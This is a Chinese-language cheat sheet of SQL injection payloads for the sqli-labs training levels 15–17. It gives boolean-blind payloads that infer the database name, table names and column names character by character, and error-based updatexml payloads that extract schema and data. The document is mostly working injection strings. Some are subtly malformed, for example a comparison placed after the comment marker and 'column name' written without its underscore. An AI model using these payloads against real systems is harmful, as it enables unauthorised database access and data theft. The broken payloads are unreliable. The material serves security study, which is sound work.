【less-15:布尔盲注】
单引号闭合
1. ' or (length(database())) -- += 数字:判断数据库长度;
2. ' or (ascii(substr(database(),1,1))) -- += 数字:获取组成数据库的字符;
3. ' or (ascii(substr((select table_name from information_schema.tables where table_schema=database limit 0,1),1,1)))=数字 -- + :获取数据表名;
4. ' or (ascii(substr((select column_name from information_schema.columns where table_schema=database and table_name=数据表名 limit 0,1),1,1)))=数字 -- + :获取数据表字段;
【less-16:布尔盲注】
双引号加括号闭合
1. ") or (length(database()))= 数字 -- +:判断数据库长度;
2. ") or (ascii(substr(database(),1,1))) -- += 数字:获取组成数据库的字符;
3. ") or (ascii(substr((select table_name from information_schema.tables where table_schema=database limit 0,1),1,1)))=数字 -- + :获取数据表名;
4. ") or (ascii(substr((select column_name from information_schema.columns where table_schema=database and table_name=数据表名 limit 0,1),1,1)))=数字 -- + :获取数据表字段;
【less-17:报错注入】
1.判断是否存在注入:'or 1=1--qwe
2.判断库名:'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- +
3.判断表名:'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='数据库' limit 0,1),0x7e),1)-- +
4.判断列名:' and updatexml(1,concat(0x7e,(select column name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),0x7e),1)-- +
5. 判断数据:' and updatexml(1,concat(0x7e,(select 字段 from 表名 limit 0,1),0x7e),1)-- +